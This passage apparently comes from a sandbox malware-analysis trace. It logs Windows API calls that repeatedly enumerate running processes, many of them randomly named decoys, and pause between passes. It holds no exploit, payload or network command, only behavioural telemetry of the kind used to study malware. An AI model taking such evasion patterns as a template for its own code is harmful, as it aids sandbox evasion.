Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0152.401] CloseHandle (hObject=0xc4) returned 1 [0152.401] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.406] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0152.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0152.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0152.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0152.478] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0152.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0152.480] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0152.481] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.482] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.483] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0152.484] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0152.485] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0152.486] CloseHandle (hObject=0xbc) returned 1 [0152.486] Sleep (dwMilliseconds=0x12c) [0152.799] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.803] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.804] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.815] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.816] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.816] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.820] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.821] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.822] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.823] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.824] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.825] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.827] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.830] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 